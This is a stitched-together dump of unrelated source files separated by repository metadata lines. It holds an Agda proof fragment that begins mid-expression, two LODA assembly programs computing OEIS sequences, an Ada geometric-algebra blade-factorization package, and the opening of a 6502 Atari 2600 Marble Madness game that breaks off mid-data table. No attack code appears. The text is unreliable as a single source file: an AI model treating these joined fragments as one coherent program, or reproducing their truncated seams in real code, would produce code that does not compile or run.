[t₂≡f₂b₂] ([f₂ext] [ρ] ⊢Δ [b₂] [b₁:F₂] (symEqTerm ([F₂] [ρ] ⊢Δ) [b₁≡b₂:F₂]))) [t₁≡t₂] = transEqTerm ([G₁] [ρ] ⊢Δ [b₁]) [t₁≡f₂b₁] (convEqTerm₂ ([G₁] [ρ] ⊢Δ [b₁]) ([G₂] [ρ] ⊢Δ [b₂]) [G₁b₁≡G₂b₂] [f₂b₁≡t₂]) x = eqrecursor [ρ] ⊢Δ [b₁] [b₂] [G₁b₁≡G₂b₂] [x₃] [x₄] [G₃x₃≡G₄x₄] [t₁] [t₂] [t₁≡t₂] (g₁.⊢snde′ [ρ] ⊢Δ (escapeTerm ([F₃] [ρ] ⊢Δ) [x₃])) (g₂.⊢snde′ [ρ] ⊢Δ (escapeTerm ([F₄] [ρ] ⊢Δ) [x₄])) in x g₁≡g₂ : Γ ⊢ (lam F₃ ▹ g₁.g (step id) (var 0) ^ ⁰) ≅ (lam F₄ ▹ g₂.g (step id) (var 0) ^ ⁰) ∷ Π F₃ ^ rF ° ⁰ ▹ G₃ ° ⁰ ° ⁰ ^ [ ! , ι ⁰ ] g₁≡g₂ = let Δ₁ = g₁.Δ₁ ⊢Δ₁ = g₁.⊢Δ₁ [ρ₁] = g₁.[ρ₁] ⊢F₃′ = Twk.wk (Twk.step Twk.id) ⊢Δ₁ ⊢F₃ ⊢g₁0 = escapeTerm ([G₃] [ρ₁] ⊢Δ₁ g₁.[0]) (g₁.[g] [ρ₁] ⊢Δ₁ g₁.[0]) ⊢g₁0′ = (PE.subst (λ X → Δ₁ ⊢ g₁.g (step id) (var 0) ∷ X ^ [ ! , ι ⁰ ]) (wkSingleSubstId G₃) ⊢g₁0) ⊢g₁0″ = Twk.wkTerm (Twk.lift (Twk.step Twk.id)) (⊢Δ₁ ∙ ⊢F₃′) ⊢g₁0′ ⊢F₄′ = Twk.wk (Twk.step Twk.id) ⊢Δ₁ ⊢F₄ ⊢g₂0 = escapeTerm ([G₄] g₂.[ρ₁] g₂.⊢Δ₁ g₂.[0]) (g₂.[g] g₂.[ρ₁] g₂.⊢Δ₁ g₂.[0]) ⊢g₂0′ = (PE.subst (λ X → g₂.Δ₁ ⊢ g₂.g (step id) (var 0) ∷ X ^ [ ! , ι ⁰ ]) (wkSingleSubstId G₄) ⊢g₂0) ⊢g₂0″ = Twk.wkTerm (Twk.lift (Twk.step Twk.id)) (⊢Δ₁ ∙ ⊢F₄′) ⊢g₂0′ D₁ : Δ₁ ⊢ (lam (wk1 F₃) ▹ wk1d (g₁.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ⇒* g₁.g (step id) (var 0) ∷ wk1d G₃ [ var 0 ] ^ ι ⁰ D₁ = PE.subst (λ X → Δ₁ ⊢ (lam (wk1 F₃) ▹ wk1d (g₁.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ⇒ X ∷ wk1d G₃ [ var 0 ] ^ ι ⁰) (wkSingleSubstId (g₁.g (step id) (var 0))) (β-red (≡is≤ PE.refl) (≡is≤ PE.refl) ⊢F₃′ ⊢g₁0″ (var ⊢Δ₁ here)) ⇨ id ⊢g₁0 F₃≡F₄ = escapeEq ([F₃] [ρ₁] ⊢Δ₁) ([F₃≡F₄] [ρ₁] ⊢Δ₁) [0:F₄] : Δ₁ ⊩⟨ ι ⁰ ⟩ var 0 ∷ wk (step id) F₄ ^ [ rF , ι ⁰ ] / [F₄] [ρ₁] ⊢Δ₁ [0:F₄] = neuTerm ([F₄] [ρ₁] ⊢Δ₁) (var 0) (conv (var ⊢Δ₁ here) (≅-eq F₃≡F₄)) (~-var (conv (var ⊢Δ₁ here) (≅-eq F₃≡F₄))) D₂ : Δ₁ ⊢ (lam (wk1 F₄) ▹ wk1d (g₂.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ⇒* g₂.g (step id) (var 0) ∷ wk1d G₄ [ var 0 ] ^ ι ⁰ D₂ = PE.subst (λ X → Δ₁ ⊢ (lam (wk1 F₄) ▹ wk1d (g₂.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ⇒ X ∷ wk1d G₄ [ var 0 ] ^ ι ⁰) (wkSingleSubstId (g₂.g (step id) (var 0))) (β-red (≡is≤ PE.refl) (≡is≤ PE.refl) ⊢F₄′ ⊢g₂0″ (conv (var ⊢Δ₁ here) (≅-eq F₃≡F₄))) ⇨ id (escapeTerm ([G₄] [ρ₁] ⊢Δ₁ [0:F₄]) (g₂.[g] [ρ₁] ⊢Δ₁ [0:F₄])) [g₁0≡g₁] : Δ₁ ⊩⟨ ι ⁰ ⟩ (lam (wk1 F₃) ▹ wk1d (g₁.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ≡ g₁.g (step id) (var 0) ∷ wk1d G₃ [ var 0 ] ^ [ ! , ι ⁰ ] / [G₃] [ρ₁] ⊢Δ₁ g₁.[0] [g₁0≡g₁] = proj₂ (redSubst*Term D₁ ([G₃] [ρ₁] ⊢Δ₁ g₁.[0]) (g₁.[g] [ρ₁] ⊢Δ₁ g₁.[0])) [g₂0≡g₂] : Δ₁ ⊩⟨ ι ⁰ ⟩ (lam (wk1 F₄) ▹ wk1d (g₂.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ≡ g₂.g (step id) (var 0) ∷ wk1d G₄ [ var 0 ] ^ [ ! , ι ⁰ ] / [G₄] [ρ₁] ⊢Δ₁ [0:F₄] [g₂0≡g₂] = proj₂ (redSubst*Term D₂ ([G₄] [ρ₁] ⊢Δ₁ [0:F₄]) (g₂.[g] [ρ₁] ⊢Δ₁ [0:F₄])) [g₁≡g₂]′ : Δ₁ ⊩⟨ ι ⁰ ⟩ g₁.g (step id) (var 0) ≡ g₂.g (step id) (var 0) ∷ wk1d G₃ [ var 0 ] ^ [ ! , ι ⁰ ] / [G₃] [ρ₁] ⊢Δ₁ g₁.[0] [g₁≡g₂]′ = [g₁≡g₂] [ρ₁] ⊢Δ₁ g₁.[0] (convTerm₁ ([F₃] [ρ₁] ⊢Δ₁) ([F₄] [ρ₁] ⊢Δ₁) ([F₃≡F₄] [ρ₁] ⊢Δ₁) g₁.[0]) (reflEqTerm ([F₃] [ρ₁] ⊢Δ₁) g₁.[0]) [g₁0≡g₂0] = transEqTerm ([G₃] [ρ₁] ⊢Δ₁ g₁.[0]) (transEqTerm ([G₃] [ρ₁] ⊢Δ₁ g₁.[0]) [g₁0≡g₁] [g₁≡g₂]′) (convEqTerm₂ ([G₃] [ρ₁] ⊢Δ₁ g₁.[0]) ([G₄] [ρ₁] ⊢Δ₁ [0:F₄]) ([G₃≡G₄] [ρ₁] ⊢Δ₁ g₁.[0]) (symEqTerm ([G₄] [ρ₁] ⊢Δ₁ [0:F₄]) [g₂0≡g₂])) x₀ = escapeTermEq ([G₃] [ρ₁] ⊢Δ₁ g₁.[0]) [g₁0≡g₂0] x₁ = PE.subst (λ X → Δ₁ ⊢ (lam (wk1 F₃) ▹ wk1d (g₁.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ≅ (lam (wk1 F₄) ▹ wk1d (g₂.g (step id) (var 0)) ^ ⁰) ∘ (var 0) ^ ⁰ ∷ X ^ [ ! , ι ⁰ ]) (wkSingleSubstId G₃) x₀ in ≅-η-eq (≡is≤ PE.refl) (≡is≤ PE.refl) ⊢F₃ g₁.⊢λg (conv g₂.⊢λg (sym (≅-eq A₃≡A₄))) lamₙ lamₙ x₁ [g₁a≡g₂a] : ∀ {ρ Δ a} → ([ρ] : ρ Twk.∷ Δ ⊆ Γ) (⊢Δ : ⊢ Δ) → ([a] : Δ ⊩⟨ ι ⁰ ⟩ a ∷ wk ρ F₃ ^ [ rF , ι ⁰ ] / [F₃] [ρ] ⊢Δ) → (Δ ⊩⟨ ι ⁰ ⟩ wk ρ (lam F₃ ▹ g₁.g (step id) (var 0) ^ ⁰) ∘ a ^ ⁰ ≡ wk ρ (lam F₄ ▹ g₂.g (step id) (var 0) ^ ⁰) ∘ a ^ ⁰ ∷ wk (lift ρ) G₃ [ a ] ^ [ ! , ι ⁰ ] / [G₃] [ρ] ⊢Δ [a]) [g₁a≡g₂a] [ρ] ⊢Δ [a] = let [a]′ = convTerm₁ ([F₃] [ρ] ⊢Δ) ([F₄] [ρ] ⊢Δ) ([F₃≡F₄] [ρ] ⊢Δ) [a] [a≡a] = reflEqTerm ([F₃] [ρ] ⊢Δ) [a] in redSubst*EqTerm (g₁.g∘a≡ga [ρ] ⊢Δ [a]) (g₂.g∘a≡ga [ρ] ⊢Δ [a]′) ([G₃] [ρ] ⊢Δ [a]) ([G₄] [ρ] ⊢Δ [a]′) ([G₃≡G₄] [ρ] ⊢Δ [a]) (g₁.[g] [ρ] ⊢Δ [a]) (g₂.[g] [ρ] ⊢Δ [a]′) ([g₁≡g₂] [ρ] ⊢Δ [a] [a]′ [a≡a])

oeis/097/A097834.asm

neoneye/loda-programs

11

93922

; A097834: Chebyshev polynomials S(n,27) + S(n-1,27) with Diophantine property. ; Submitted by <NAME> ; 1,28,755,20357,548884,14799511,399037913,10759224140,290100013867,7821941150269,210902311043396,5686540457021423,153325690028535025,4134107090313424252,111467565748433919779,3005490168117402409781,81036766973421431144308,2184987218114261238486535,58913618122111632007992137,1588482702078899802977301164,42830119338008183048379139291,1154824739424142042503259459693,31137437845113826964539626272420,839555997078649186000066649895647,22636874483278414195037259920910049 mov $2,2 mov $3,1 lpb $0 sub $0,1 mov $1,$3 mul $1,25 add $2,$1 add $3,$2 lpe mov $0,$3

ga_ref_impl/src/multivector_utilities.adb

rogermc2/GA_Ada

3

5830

with Ada.Text_IO; use Ada.Text_IO; with Interfaces; with Bits; with Blade; with Blade_Types; -- with GA_Utilities; with Metric; with Multivector_Type; package body Multivector_Utilities is -- Factorize_Blades returns the k unit factors of the blade and -- the scale of the blade function Factorize_Blades (MV_B : Multivectors.Multivector; Scale : out Float) return Multivectors.Multivector_List is use Interfaces; use Blade; use Multivectors; MV_Type_Rec : Multivector_Type.MV_Type_Record; K_Grade : Integer := 0; Grade_Valid : Grade_Status; E_Largest : Basis_Blade; Basis_Bit : Unsigned_32; B_Current : Multivector; aFactor : Multivector; Factors : Multivector_List; E_Array : Basis_Blade_Array (1 .. Space_Dimension); E_Bitmap : Unsigned_32; Idx : Integer := 0; begin if Space_Dimension < 1 then raise MV_Utilities_Exception with "Multivector_Utilities.Factorize_Blades Geometry type has not been set."; end if; if not Is_Null (MV_B) then Grade_Valid := Grade (MV_B, K_Grade); if Grade_Valid = Grade_Inhomogeneous then MV_Type_Rec := Multivector_Type.Init (MV_B); K_Grade := Multivector_Type.MV_Grade (MV_Type_Rec); elsif Grade_Valid = Grade_Null then raise MV_Utilities_Exception with "Multivector_Utilities.Factorize_Blades null grade multivector detected."; end if; -- set scale of output if K_Grade = 0 then Scale := Scalar_Part (MV_B); else Scale := Norm_E (MV_B); end if; -- Put_Line ("Multivector_Utilities.Factorize_Blades, K_Grade:" & -- Integer'Image (K_Grade)); if K_Grade > 0 and Scale /= 0.0 then -- not a scalar-blade or a null-blade -- get largest basis blade E_Largest := Largest_Basis_Blade (MV_B); E_Bitmap := Bitmap (E_Largest); -- GA_Utilities.Print_Blade ("Multivector_Utilities.Factorize_Blades, E_Largest", -- E_Largest); -- Put_Line ("Multivector_Utilities.Factorize_Blades, E_Bitmap" -- & Unsigned_32'Image (E_Bitmap)); -- Determine the K basis vectors that span the largest basis blade for Index_G in 0 .. Space_Dimension - 1 loop -- Shift 1 left by Index_G bits Basis_Bit := Shift_Left (1, Index_G); if (E_Bitmap and Basis_Bit) /= 0 then Idx := Idx + 1; E_Array (Idx) := New_Basis_Blade (Basis_Bit); end if; end loop; -- GA_Utilities.Print_Blade_String_Array -- ("Multivector_Utilities.Factorize_Blades, basis vectors that span the largest basis blade", E_Array, -- Blade_Types.Basis_Names_C3GA); -- setup the 'current input blade' B_Current := Geometric_Product (MV_B, 1.0 / Scale); -- for all but one of the E_Array basis vectors: for index in 1 .. Space_Dimension - 1 loop -- Project basis vector E_Array (index) onto B_Current -- (E(i) lc B_Current) inv(B_Current) but -- inv(B_Current) not required because Bc is a unit vector aFactor := New_Multivector (E_Array (index)); aFactor := Inner_Product (Inner_Product (aFactor, B_Current, Left_Contraction), B_Current, Left_Contraction); if not Is_Null (aFactor) then -- Normalize aFactor aFactor := Unit_E (aFactor); Add_Multivector (Factors, aFactor); -- Remove aFactor from B_Current B_Current := Inner_Product (aFactor, B_Current, Left_Contraction); end if; end loop; -- last factor = what is left of the input blade -- B_Current is already normalized but -- renormalize to remove any floating point round-off error Add_Multivector (Factors, Unit_E (B_Current)); end if; end if; return Factors; exception when others => Put_Line ("An exception occurred in Multivector_Utilities.Factorize_Blades"); raise; end Factorize_Blades; -- ------------------------------------------------------------------------ function Factorize_Blade_Fast (MV_B : Multivectors.Multivector; Scale : out Float) return Multivectors.Multivector_List is use Interfaces; use Blade; use Blade_Types; use Multivectors; Grade_K : Unsigned_32; Sc : Float; Blade_E : Basis_Blade; Lowest_Bit : Integer; Highest_Bit : Integer; Blades_B : Blade_List; Basis_Bit : Unsigned_32; Basis_Bitmap : Unsigned_32; Vec_Bitmap : Unsigned_32; Blades_Bj : Basis_Blade; Factors : Multivector_List; -- F L_List : Blade_List; begin if Space_Dimension < 1 then raise MV_Utilities_Exception with "Multivector_Utilities.Factorize_Blades Geometry type has not been set."; end if; if Grade (MV_B, Integer (Grade_K)) /= Grade_OK then raise MV_Utilities_Exception with "Multivector_Utilities.Factorize_Blade inhomogenous multivector detected."; else if Grade_K = 0 then Scale := Scalar_Part (MV_B); else Scale := Norm_E (MV_B); end if; if Grade_K > 0 and Scale /= 0.0 then Blade_E := Largest_Basis_Blade (MV_B); Lowest_Bit := Bits.Lowest_One_Bit (Bitmap (Blade_E)); Highest_Bit := Bits.Highest_One_Bit (Bitmap (Blade_E)); if Grade_K = 1 then Add_Multivector (Factors, Unit_E (MV_B)); else if Weight (Blade_E) < 0.0 then -- positive scale for blade needed Scale := - Scale; -- take care of orientation of blade: if (Grade_K and 1) = 1 then Scale := - Scale; end if; end if; -- fix sign issues if (Grade_K mod 4) = 2 then Scale := - Scale; end if; Blades_B := Blades (MV_B); for index in Lowest_Bit .. Highest_Bit loop Basis_Bit := Shift_Left (1, Integer (index)); if (Bitmap (Blade_E) and Basis_Bit) /= 0 then Basis_Bitmap := Bitmap (Blade_E) xor Basis_Bit; New_Line; for index_j in 1 .. List_Length (Blades_B) loop Blades_Bj := BB_Item (Blades_B, index_j); if (Bitmap (Blades_Bj) and Basis_Bitmap) = Basis_Bitmap then Vec_Bitmap := Bitmap (Blades_Bj) xor Basis_Bitmap; Sc := Weight (Blades_Bj) * Canonical_Reordering_Sign (Basis_Bitmap, Bitmap (Blades_Bj)); Blade.Add_Blade (L_List, New_Basis_Blade (C3_Base'Enum_Val (Vec_Bitmap), Sc)); end if; end loop; end if; Add_Multivector (Factors, New_Multivector (L_List)); end loop; end if; else Add_Multivector (Factors, New_Multivector (0.0)); end if; end if; return Factors; exception when others => Put_Line ("An exception occurred in Multivector_Utilities.Factorize_Blade_Fast"); raise; end Factorize_Blade_Fast; -- -------------------------------------------------------------------- function Reflect (MV : Multivectors.Multivector; DP : Multivectors.Dual_Plane) return Multivectors.Multivector is use Metric; use Multivectors; IDP : constant Multivector := General_Inverse (DP, C3_Metric); begin return Geometric_Product (-DP, Geometric_Product (MV, IDP, C3_Metric), C3_Metric); end Reflect; -- ------------------------------------------------------------------------ function Rotate (MV : Multivectors.Multivector; aVersor : Multivectors.TR_Versor) return Multivectors.Multivector is use Metric; use Multivectors; IV : constant Multivector := General_Inverse (aVersor, C3_Metric); begin return Geometric_Product (aVersor, Geometric_Product (MV, IV, C3_Metric), C3_Metric); end Rotate; -- ------------------------------------------------------------------------ end Multivector_Utilities;

oeis/241/A241572.asm

neoneye/loda-programs

11

18697

<filename>oeis/241/A241572.asm ; A241572: Numbers n such that 2*n+17 is not a prime. ; Submitted by <NAME>(s1.) ; 2,4,5,8,9,11,14,16,17,19,20,23,24,26,29,30,32,34,35,37,38,39,41,44,47,49,50,51,52,53,54,56,58,59,62,63,64,65,68,69,71,72,74,76,77,79,80,83,84,85,86,89,92,93,94,95,96,98,99,100,101,102,104,107,109,110,113,114,115,116,118,119,121,122,124,125,128,129,131,134,135,136,137,139,140,141,142,143,144,146,149,151,152,153,154,155,156,158,159,161 add $0,3 mov $1,4 mov $2,1 lpb $0 mov $3,$2 lpb $3 add $2,2 mov $4,$1 gcd $4,$2 cmp $4,1 sub $3,$4 lpe sub $0,1 add $2,2 mul $1,$2 lpe mov $0,$2 div $0,2 sub $0,8

marble.asm

johnkharvey/marble_madness_2600

1

13496

;=================================== ; "<NAME>" ; -- The Beginner Race ; ; (for your Atari 2600) ;=================================== ;=================================== ; Special Thanks: ; - grafixbmp ;=================================== ;=================================== ; Bank Layouts ; Bank 1 = Graphics/kernels ; Bank 2 = Collision detection handling after Bank3/Bank4 table lookup ; Bank 3 = Collision table processing for left side of screen ; Bank 4 = Collision table processing for right side of screen ;=================================== ;=================================== ; RAM Allocation ;=================================== ;--------------------- ; $80-$8F = Normal variables ;--------------------- Temp = $80 ; potentially a WORD ;------------ ; Allows us to switch banks and go to a location ; in the new bank ;------------ ReturnAddress = $82 ; a WORD SecondsRemaining = $84 FrameCounter = $85 LevelNumber = $86 LeftNumber = $87 ; and $88 RightNumber = $89 ; and $8A ; 0 = start screen / direction select screen ; 1 = level 1 play ; 2 = level 1 win GamePhase = $8B NinetyDegrees = $8C ; 0 = 90, 1 = 45 IncreasingCounter = $8D CollisionStatusFromTable = $8E ;--------------------- ; $90-$9F = Screen variables ;--------------------- SWCHAStore = $90 ScrollPointerTop = $91 ScrollPointerBottom = $92 OddFrameCheck = $93 Player0HPosition = $94 Player1HPosition = $95 Player0VPosition = $96 Player0VPosition2 = $97 ; just a bit used to slow things down Player0HPositionA = $98 Player0VPositionA = $99 Player0SpeedDown = $9A Player0SpeedUp = $9B Player0SpeedLeft = $9C Player0SpeedRight = $9D CollisionByte = $9E MarbleFallStatus = $9F ;--------------------- ; $A0-$AF = Marble RAM ;--------------------- P0MarbleRAM = $A0 ; 8 bytes ; Next is $A8 ;=================================== ; Constants NTSC = 1 DEBUG = 0 LEVEL = 0 MAXLEVELHEIGHT = 200 ANGLE_PIPE = %00000000 ANGLE_SLASH = %01000000 ANGLE_BACKSLASH = %10000000 ANGLE_MINUS = %11000000 ;=================================== ;=================================== processor 6502 include hdr/vcs.h ;=================================== MAC JUMP_TABLE ; put this at the start of every bank RORG $F000 Bank1 cmp SelectBank1 ; 3 bytes jmp Bank1Code ; 3 bytes Bank2 cmp SelectBank2 ; 3 bytes jmp Bank2Code ; 3 bytes Bank3 cmp SelectBank3 ; 3 bytes jmp Bank3Code ; 3 bytes Bank4 cmp SelectBank4 ; 3 bytes jmp Bank4Code ; 3 bytes ENDM ;=================================== MAC BANKS_AND_VECTORS; put this at the end of every bank ;RORG $FFF8 RORG $FFF6 SelectBank1 .byte $00 SelectBank2 .byte $00 SelectBank3 .byte $00 SelectBank4 .byte $00 .word Bank1; NMI .word Bank1; RESET .word Bank1; IRQ ENDM ;=================================== ;##################################################### ;##################################################### ;##################################################### ;### ### ;### Bank 1 below ### ;### ### ;##################################################### ;##################################################### ;##################################################### ;============ org $C000 ;============ JUMP_TABLE org $C018 rorg $F018 ;================= Bank1Code ;================= LDA ReturnAddress+1 CMP #>AfterCollision_InBank1 BNE TestReturnAddress2 LDA ReturnAddress CMP #<AfterCollision_InBank1 BNE TestReturnAddress2 JMP AfterCollision_InBank1 TestReturnAddress2 ;================= Start ;================= SEI CLD LDX #$FF TXS LDA #0 ClearingRAM STA 0,X ; clear $FF through $1 (not $0, VSYNC). DEX BNE ClearingRAM ; Stuff for First screen LDA #0 ; startup phase "Marble Madness" screen STA GamePhase STA NinetyDegrees STA FrameCounter ; zero-frame for seconds timer ;================= GameInitBank1 ;================= ; Do init stuff LDA #200 STA ScrollPointerTop ; highest for practiceLevel LDA #(200-89) STA ScrollPointerBottom ; lowest LDA #1 STA OddFrameCheck ; even frame LDA #78 STA Player0HPosition LDA #189 STA Player0VPosition ; these are divided by 2, so pos is 20. LDA #0 STA Player0VPosition2 ; 0 or 1, frame counter to slow ball STA Player0HPositionA ; speed STA Player0VPositionA ; speed STA Player0SpeedDown STA Player0SpeedUp STA Player0SpeedLeft STA Player0SpeedRight STA LevelNumber ; level zero STA MarbleFallStatus LDA #$60 ; BCD, so hex STA SecondsRemaining LDA #>Numbers STA RightNumber+1 STA LeftNumber+1 ;================= MainLoopBank1 ;================= JSR VerticalBlankBank1 ; Execute the vertical blank. ; different game phases have different kernels INC IncreasingCounter ; always increases LDA GamePhase BNE NotGamePhaseZero ; Game phase zero JSR ResetSelectCheck JSR GameCalcStartScreenBank1 ; Do calculations during Vblank JSR TitleScreenBank1 ; Draw the screen JMP AfterDrawScreen NotGamePhaseZero CMP #1 BEQ GamePhaseOne CMP #2 BEQ GamePhaseTwo JMP AfterDrawScreen GamePhaseOne GamePhaseTwo JSR ResetSelectCheck JSR GameCalcBank1 ; Do calculations during Vblank JSR DrawScreenBank1 ; Draw the screen AfterDrawScreen JSR OverScanBank1 ; Do more calculations during overscan ;================== JMP MainLoopBank1 ; Continue forever. ;================== ;================= VerticalBlankBank1 ;================= LDX #0 LDA #2 STA WSYNC STA VSYNC ; Begin vertical sync. STA WSYNC ; First line of VSYNC STA WSYNC ; Second line of VSYNC. IF NTSC LDA #44 ELSE ; (PAL) LDA #54 ENDIF STA TIM64T LDA #0 ; Now we can end the VSYNC period. STA WSYNC ; Third line of VSYNC. STA VSYNC ; (0) ;================== RTS ;================== ;======================== ; Reset/select pressed ;======================== ResetSelectCheck LDA SWCHB AND #%00000001 BNE ResetNotPressed LDX #$FF TXS IF NTSC LDY #0 LDX #249 ELSE ; PAL LDY #1 LDX #43 ENDIF WsyncLoopOnReset STA WSYNC DEX BNE WsyncLoopOnReset DEY BPL WsyncLoopOnReset JMP GameInitBank1 ResetNotPressed RTS ;================= ;================= GameCalcStartScreenBank1 ;================= ; if fire button pressed, then game on LDA INPT4 BMI LeftFireButtonNotPressed LDA #1 STA GamePhase LeftFireButtonNotPressed ; if left/right pressed, increase 90orf5 LDA SWCHA BPL RightPressedStartScreen ROL BPL LeftPressedStartScreen JMP AfterLeftRightStartScreen RightPressedStartScreen LDA #1 STA NinetyDegrees JMP AfterLeftRightStartScreen LeftPressedStartScreen LDA #0 STA NinetyDegrees AfterLeftRightStartScreen RTS ;================= GameCalcBank1 ;================= ;================= ; Deal with timer countdown ;================= LDA SecondsRemaining BNE GameNotOver ; Game Over JMP NoPlayerMovement GameNotOver INC FrameCounter LDA FrameCounter CMP #60 BNE Not60Frames LDA #0 STA FrameCounter SED ; BCD IF DEBUG = 1 LDA SecondsRemaining SEC SBC #0 STA SecondsRemaining ELSE LDA GamePhase CMP #2 BEQ WeWonDontDecTimer LDA SecondsRemaining SEC SBC #1 STA SecondsRemaining WeWonDontDecTimer ENDIF CLD ; back to normal math Not60Frames ;================= ;================= LDA SWCHA STA SWCHAStore ;================= ;================= LDA MarbleFallStatus BEQ TransformSWCHA JMP InitialJoyCheckDone ;================= ;================= ; Transform SWCHA - based on 45 or 90 ;================= TransformSWCHA LDA NinetyDegrees BEQ DealWithUp ; 45 degree transformation ; right / left / down / up LDA SWCHAStore BPL Transform45Right ROL BPL Transform45Left ROL BPL Transform45Down ROL BPL Transform45Up JMP DealWithUp ; nothing really to do, no direction pressed Transform45Right LDA #%01011111 ; right goes down and right STA SWCHAStore JMP DealWithUp ; first transformation done Transform45Left LDA #%10101111 ; left goes up and left STA SWCHAStore JMP DealWithUp ; first transformation done Transform45Down LDA #%10011111 ; down goes down and left STA SWCHAStore JMP DealWithUp ; first transformation done Transform45Up LDA #%01101111 ; up goes up and right STA SWCHAStore ; first transformation done ;================= ; Transform SWCHA - based on inertia ;================= DealWithUp LDA SWCHAStore AND #%00010000 ; up BNE UpNotPressed ; Up pressed. Are we going down? LDA Player0SpeedDown BEQ NotMovingDownAndUpPressed DEC Player0SpeedDown DEC Player0SpeedDown JMP DontMoveUp NotMovingDownAndUpPressed ; LDA Player0SpeedUp CMP #$FE ; going top speed? BEQ UpNotPressed INC Player0SpeedUp INC Player0SpeedUp UpNotPressed LDA Player0SpeedUp CLC ADC Player0VPositionA STA Player0VPositionA BCC DontMoveUp LDA SWCHAStore AND #%11101111 STA SWCHAStore JMP DealWithDown DontMoveUp LDA SWCHAStore ORA #%00010000 STA SWCHAStore ;================= DealWithDown LDA SWCHAStore AND #%00100000 ; down BNE DownNotPressed ; Down Pressed. Are we going up? LDA Player0SpeedUp BEQ NotMovingUpAndDownPressed DEC Player0SpeedUp DEC Player0SpeedUp JMP DontMoveDown NotMovingUpAndDownPressed LDA Player0SpeedDown CMP #$FE BEQ DownNotPressed INC Player0SpeedDown INC Player0SpeedDown DownNotPressed ;LDA Player0SpeedDown ;CLC ;ADC Player0VPositionA ;STA Player0VPositionA LDA Player0VPositionA SEC SBC Player0SpeedDown STA Player0VPositionA ; BCS DontMoveDown LDA SWCHAStore AND #%11011111 STA SWCHAStore JMP DealWithLeft DontMoveDown LDA SWCHAStore ORA #%00100000 STA SWCHAStore ;================= DealWithLeft LDA SWCHAStore AND #%01000000 ; left BNE LeftNotPressed ; Left pressed. Are we going right? LDA Player0SpeedRight BEQ NotMovingRightAndLeftPressed DEC Player0SpeedRight DEC Player0SpeedRight JMP DontMoveLeft NotMovingRightAndLeftPressed LDA Player0SpeedLeft CMP #$FE ; going top speed? BEQ LeftNotPressed INC Player0SpeedLeft INC Player0SpeedLeft LeftNotPressed ;LDA Player0SpeedLeft ;CLC ;ADC Player0HPositionA ;STA Player0HPositionA LDA Player0HPositionA SEC SBC Player0SpeedLeft STA Player0HPositionA ; BCS DontMoveLeft LDA SWCHAStore AND #%10111111 STA SWCHAStore JMP DealWithRight DontMoveLeft LDA SWCHAStore ORA #%01000000 STA SWCHAStore ;================= DealWithRight LDA SWCHAStore AND #%10000000 ; right BNE RightNotPressed ; Right pressed. Are we going left? LDA Player0SpeedLeft BEQ NotMovingLeftAndRightPressed DEC Player0SpeedLeft DEC Player0SpeedLeft JMP DontMoveRight NotMovingLeftAndRightPressed ; LDA Player0SpeedRight CMP #$FE ; going top speed? BEQ RightNotPressed INC Player0SpeedRight INC Player0SpeedRight RightNotPressed LDA Player0SpeedRight CLC ADC Player0HPositionA STA Player0HPositionA BCC DontMoveRight LDA SWCHAStore AND #%01111111 STA SWCHAStore JMP NoMoreDirections DontMoveRight LDA SWCHAStore ORA #%10000000 STA SWCHAStore NoMoreDirections ;================= ;================= ; Joystick up/down movement ;================= RealJoyChecks LDA SWCHAStore AND #%00010000 ; up BNE CheckDown HandleDown ; Can we move Player0 down? LDA Player0VPosition ; start value 160 SEC SBC ScrollPointerBottom CMP #80 BEQ ScrollFrameDown ; otherwise, move the ball down INC Player0VPosition2 LDA Player0VPosition2 AND #1 BNE CheckDown INC Player0VPosition JMP CheckDown ScrollFrameDown LDA ScrollPointerTop CMP #MAXLEVELHEIGHT BEQ CheckDown LDA OddFrameCheck BNE ScrollDown2 INC OddFrameCheck JMP CheckDown ; can turn to BNE later ScrollDown2 LDA #0 STA OddFrameCheck INC ScrollPointerTop INC ScrollPointerBottom CheckDown LDA SWCHAStore AND #%00100000 ; down BNE CheckRight HandleUp ; Can we move Player0 up? LDA Player0VPosition ; start value 160 SEC SBC ScrollPointerBottom CMP #10 BEQ ScrollFrameUp ; otherwise, move the ball up INC Player0VPosition2 LDA Player0VPosition2 AND #1 BNE CheckRight DEC Player0VPosition JMP CheckRight ScrollFrameUp LDA ScrollPointerTop CMP #89 ; always the bottom BEQ CheckRight LDA OddFrameCheck BEQ ScrollUp2 DEC OddFrameCheck JMP CheckRight ScrollUp2 LDA #1 STA OddFrameCheck DEC ScrollPointerTop DEC ScrollPointerBottom CheckRight LDA SWCHAStore AND #%10000000 ; right BNE CheckLeft LDA Player0HPosition CMP #136 ; right hand extrema BEQ CheckLeft INC Player0HPosition CheckLeft LDA SWCHAStore AND #%01000000 ; left BNE InitialJoyCheckDone LDA Player0HPosition CMP #16 ; left hand extrema BEQ InitialJoyCheckDone DEC Player0HPosition InitialJoyCheckDone ;================= ;================= ; set up P0/P1 for timer for frame ;================= NoPlayerMovement STA WSYNC LDY #7 PlayerCoarseLoop DEY BPL PlayerCoarseLoop NOP STA RESP0 STA RESP1 LDA #%00110000 STA HMP0 LDA #%01000000 STA HMP1 STA WSYNC STA HMOVE ;================== ;================== ; Load Marble data into RAM ;================== LDA MarbleFallStatus BEQ KeepMarbleSame ; play a noise LDA #6 STA AUDC0 LDA #7 STA AUDV0 LDA MarbleFallStatus STA AUDF0 ; other stuff LDA IncreasingCounter AND #%00000111 BNE KeepMarbleSame INC MarbleFallStatus LDA MarbleFallStatus CMP #8 BNE KeepMarbleSame LDA #0 STA MarbleFallStatus KeepMarbleSame LDX #7 LDA #7 CLC ADC MarbleFallStatus ;SEC ;SBC #1 ; just in case TAY P0MarbleInRamLoop LDA Marble1,Y STA P0MarbleRAM,X DEY DEX BPL P0MarbleInRamLoop LDA #0 STA P0MarbleRAM RTS ;================== RTS ;================== ;================== ;ORG $C400 align 256 ;================== Numbers ; Should be on a page boundary to be effective NumberZero dc.b %00011000 dc.b %00100100 dc.b %00100100 dc.b %00100100 dc.b %00100100 dc.b %00100100 dc.b %00011000 dc.b 0 NumberOne dc.b %00011100 dc.b %00001000 dc.b %00001000 dc.b %00001000 dc.b %00001000 dc.b %00011000 dc.b %00001000 dc.b 